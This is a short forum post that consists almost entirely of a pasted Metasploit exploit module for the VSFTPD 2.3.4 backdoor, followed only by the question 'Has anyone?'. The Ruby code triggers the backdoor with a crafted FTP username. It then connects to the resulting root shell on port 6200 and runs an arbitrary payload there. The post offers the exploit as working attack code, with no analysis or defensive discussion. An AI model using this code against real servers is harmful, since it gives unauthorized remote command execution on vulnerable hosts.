VSTPD v2.3.4

1 reply [Last post]
MasterX_HackerX
MasterX_HackerX's picture
Offline
Neophyte
Joined: 2010/01/22

##

# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})

super(update_info(info,

'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',

'Description' => %q{

This module exploits a malicious backdoor that was added to the VSFTPD download

archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between

June 30th 2011 and July 1st 2011 according to the most recent information

available. This backdoor was removed on July 3rd 2011.

},

'Author' => [ 'hdm', 'mc' ],

'License' => MSF_LICENSE,

'Version' => '$Revision: 13099 $',

'References' =>

[

[ 'URL', 'http://pastebin.com/AetT9sS5'],

[ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],

],

'Privileged' => true,

'Platform' => [ 'unix' ],

'Arch' => ARCH_CMD,

'Payload' =>

{

'Space' => 2000,

'BadChars' => '',

'DisableNops' => true,

'Compat' =>

{

'PayloadType' => 'cmd_interact',

'ConnectionType' => 'find'

}

},

'Targets' =>

[

[ 'Automatic', { } ],

],

'DisclosureDate' => 'Jul 3 2011',

'DefaultTarget' => 0))

register_options([ Opt::RPORT(21) ], self.class)

end

def exploit

nsock = self.connect(false, {'RPORT' => 6200}) rescue nil

if nsock

print_status("The port used by the backdoor bind listener is already open")

handle_backdoor(nsock)

return

end

# Connect to the FTP service port first

connect

banner = sock.get_once(-1, 30).to_s

print_status("Banner: #{banner.strip}")

sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")

resp = sock.get_once(-1, 30).to_s

print_status("USER: #{resp.strip}")

if resp =~ /^530 /

print_error("This server is configured for anonymous only and the backdoor code cannot be reached")

disconnect

return

end

if resp !~ /^331 /

print_error("This server did not respond as expected: #{resp.strip}")

disconnect

return

end

sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

# Do not bother reading the response from password, just try the backdoor

nsock = self.connect(false, {'RPORT' => 6200}) rescue nil

if nsock

print_good("Backdoor service has been spawned, handling...")

handle_backdoor(nsock)

return

end

disconnect

end

def handle_backdoor(s)

s.put("id\n")

r = s.get_once(-1, 5).to_s

if r !~ /uid=/

print_error("The service on port 6200 does not appear to be a shell")

disconnect(s)

return

end

print_good("UID: #{r.strip}")

s.put("nohup " + payload.encoded + " >/dev/null 2>&1")

handler(s)

end

end
Has anyone?